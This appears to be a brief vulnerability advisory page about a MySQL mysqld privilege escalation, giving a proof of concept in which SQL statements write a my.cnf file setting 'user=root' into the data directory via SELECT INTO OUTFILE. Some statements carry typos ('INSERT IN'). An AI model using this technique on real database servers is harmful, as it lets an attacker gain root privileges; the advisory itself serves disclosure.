|
|
MySQL mysqld Privilege Escalation Vulnerability
The following proof of concept was provided: mysql>CREATE DATABASE roottext; mysql>USE roottext; mysql>CREATE TABLE hack (conf VARCHAR(80)); mysql>INSERT IN hack VALUES ('[mysqld]'); mysql>INSERT IN hack VALUES ('user=root'); mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack mysql>QUIT |
|
Privacy Statement |